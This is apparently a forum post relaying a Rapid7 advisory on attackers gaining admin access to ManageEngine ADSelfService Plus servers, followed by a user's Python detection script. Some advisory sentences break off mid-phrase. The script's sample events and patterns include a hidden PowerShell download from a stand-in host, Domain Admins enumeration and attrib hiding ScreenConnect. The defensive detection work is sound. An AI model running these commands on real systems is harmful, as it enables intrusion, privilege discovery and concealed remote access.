Attackers Gaining Administrative Access to Zoho ManageEngine ADSelfService Plus Instances
FYI anyone with internet facing selfservice should act quick
Rapid7 Managed Detection and Response (MDR) recently observed several incidents in which
remote attackers have compromised internet-facing systems running
ManageEngine ADSelfService Plus in managed customer environments. The
attackers used valid ADSelfService Plus admin credentials to gain
Our team is working with the vendor to investigate potential root causes and
determine remediations. We are notifying our customers out of an abundance of
caution so that they may take steps to assess and mitigate risk to their
If your organization uses ManageEngine ADSelfService Plus, we strongly
- Changing the “admin” user’s password and enabling multi-factor authentication (MFA) for this account
- Taking the affected systems offline entirely if suspicious activity is observed
What can Rapid7 InsightVM users do to determine their
InsightVM customers can use Query Builder to find assets running ADSelfService
Plus with the following query: `software.product` `ends with` `ADSelfService
Rapid7 Nexpose customers can create a Dynamic Asset Group based on a filtered asset
search for `Software name` `contains` `ADSelfService Plus`.
InsightIDR detect attacker behavior related to this attack?
Rapid7’s existing detection rules (listed below) are able to identify this
attack. We recommend that you review your settings for these detection rules
and confirm they are turned on and set to an appropriate rule action and
priority for your organization:
- Process - Powershell Invoke-WebRequest
- Technique - Attrib Sets File Or Directory As Hidden And System
- Technique - Enumerating Domain Or Enterprise Admins With Net Command
- Process - Zoho ManageEngine Spawns Child
We have also added the following detection rule and prioritized it as
- Technique - Hiding ScreenConnect With Attrib
Rapid7 detection logic is continuously reviewed to ensure detections are
based on any observed attacker behavior seen by our Incident Response (IR),
Managed Detection and Response (MDR), and Threat Intelligence and Detection
Engineering (TIDE) teams. Through continuous collaboration and threat
landscape monitoring, we ensure product coverage for the latest techniques
being used by malicious actors and will make updates as necessary.
For up-to-date information on this threat, please refer to this article.
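For anyone without InsightIDR who wants to check their own endpoint telemetry for the behaviours those rule names describe, here is a small added example (my own illustration, not Rapid7's detection code and not ManageEngine's) that encodes each listed rule as a predicate over process-creation events. The event field names `parent`, `image` and `cmdline`, the ManageEngine install path, and the sample events are all constructed assumptions; the real rules will be more nuanced than these string matches.

```python
"""Toy re-implementations of the five InsightIDR rule names from the advisory.

Added illustration only; not Rapid7's rule logic. Events are dicts with the
assumed keys "parent" (parent image path), "image" (process image path) and
"cmdline" (full command line), as a Sysmon/EDR process-creation log might give.
"""
import re

RULES = {}  # rule name -> predicate(event) -> bool, in advisory order


def rule(name):
    """Register a predicate under the rule name used in the advisory."""
    def deco(fn):
        RULES[name] = fn
        return fn
    return deco


def _image_is(event, *names):
    return event["image"].lower().endswith(names)


def _attrib_sets_hidden_and_system(event):
    # attrib.exe invoked with both +h (hidden) and +s (system) switches.
    if not _image_is(event, "attrib.exe"):
        return False
    flags = {tok.lower() for tok in event["cmdline"].split() if tok.startswith("+")}
    return {"+h", "+s"} <= flags


@rule("Process - Powershell Invoke-WebRequest")
def powershell_invoke_webrequest(event):
    if not _image_is(event, "powershell.exe", "pwsh.exe"):
        return False
    # The cmdlet and its built-in aliases (iwr, wget, curl).
    return re.search(r"\b(invoke-webrequest|iwr|wget|curl)\b", event["cmdline"], re.I) is not None


@rule("Technique - Attrib Sets File Or Directory As Hidden And System")
def attrib_hidden_and_system(event):
    return _attrib_sets_hidden_and_system(event)


@rule("Technique - Enumerating Domain Or Enterprise Admins With Net Command")
def net_enumerates_admins(event):
    if not _image_is(event, "net.exe", "net1.exe"):
        return False
    return re.search(r"\bgroup\b.*\b(domain|enterprise) admins\b", event["cmdline"], re.I) is not None


@rule("Process - Zoho ManageEngine Spawns Child")
def manageengine_spawns_child(event):
    # ADSelfService Plus runs from a ManageEngine install directory (assumed path pattern);
    # a child of its Java process is unusual in normal operation.
    return "manageengine" in event["parent"].lower()


@rule("Technique - Hiding ScreenConnect With Attrib")
def hiding_screenconnect(event):
    return _attrib_sets_hidden_and_system(event) and "screenconnect" in event["cmdline"].lower()


def evaluate(event):
    """Return the names of every rule that fires on one event, in advisory order."""
    return [name for name, pred in RULES.items() if pred(event)]


def scan(events):
    """Return (command line, fired rule names) for each event that matched at least one rule."""
    return [(e["cmdline"], hits) for e in events if (hits := evaluate(e))]


# Constructed sample events (not real telemetry); the first four mirror the advisory's rule set.
SAMPLE_EVENTS = [
    {"parent": r"C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden Invoke-WebRequest -Uri http://example.invalid/x -OutFile C:\Temp\x"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": 'net group "Domain Admins" /domain'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\attrib.exe",
     "cmdline": r"attrib +h +s C:\ProgramData\ScreenConnect Client"},
    {"parent": r"C:\Windows\explorer.exe",          # benign admin activity, should not fire
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{cmdline!r}\n    -> {', '.join(hits)}")
```

The fourth sample shows why the new ScreenConnect rule was added on top of the generic attrib rule: the generic one fires on any `+h +s`, while the specific one only fires when the hidden path names the remote-access tool, which is what you would page on first.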
Does anyone know how to configure the admin account for MFA like indicated in the article?
New to ADSelfService Plus?